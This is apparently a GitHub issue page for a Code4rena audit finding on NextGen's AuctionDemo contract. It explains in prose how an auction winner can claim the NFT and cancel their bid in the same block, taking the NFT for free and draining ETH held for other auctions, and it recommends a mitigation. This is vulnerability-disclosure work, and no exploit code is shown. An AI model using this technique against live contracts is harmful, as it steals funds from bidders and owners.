Auction winner can claim their NFT and cancel their bid #274
Labels
3 (High Risk)
Assets can be stolen/lost/compromised directly
bug
Something isn't working
duplicate-1323
satisfactory
satisfies C4 submission criteria; eligible for awards
Lines of code
https://github.com/code-423n4/2023-10-nextgen/blob/8b518196629faa37eae39736837b24926fd3c07c/smart-contracts/AuctionDemo.sol#L104
https://github.com/code-423n4/2023-10-nextgen/blob/8b518196629faa37eae39736837b24926fd3c07c/smart-contracts/AuctionDemo.sol#L124
https://github.com/code-423n4/2023-10-nextgen/blob/8b518196629faa37eae39736837b24926fd3c07c/smart-contracts/AuctionDemo.sol#L134
Vulnerability details
Impact
In the AuctionDemo contract the winner of the auction can claim their NFT and cancel their bid. This means that they can get the NFT for free.
This is done in the following steps, at the end of the auction(block.timestamp == minter.getAuctionEndTime(_tokenid)):
This attack does require the amount of ETH in the contract to be greater than or equal to the winning bid(before the attacker places the bid). This should easiely be possible with other auctions happening.
It also has the effect of there not being enough ETH left for the other auctions meaning that some of the bidders will not recieve their refund and the owner may not recieve the winning bid.
Proof of Concept
In this POC we assume there are other auctions happening and that the sum of their bids is greater than 1 ETH
This ensures there is enough balance for the attacker to cancel their bid
Tools Used
Foundry
Recommended Mitigation Steps
Update claimAuction() so that it can only be called after the end of the auction and not at the end.
This ensures that claimAuction() and cancelBid()/cancelAllBids() are not able to be called in the same transaction
Assessed type
Timing
The text was updated successfully, but these errors were encountered: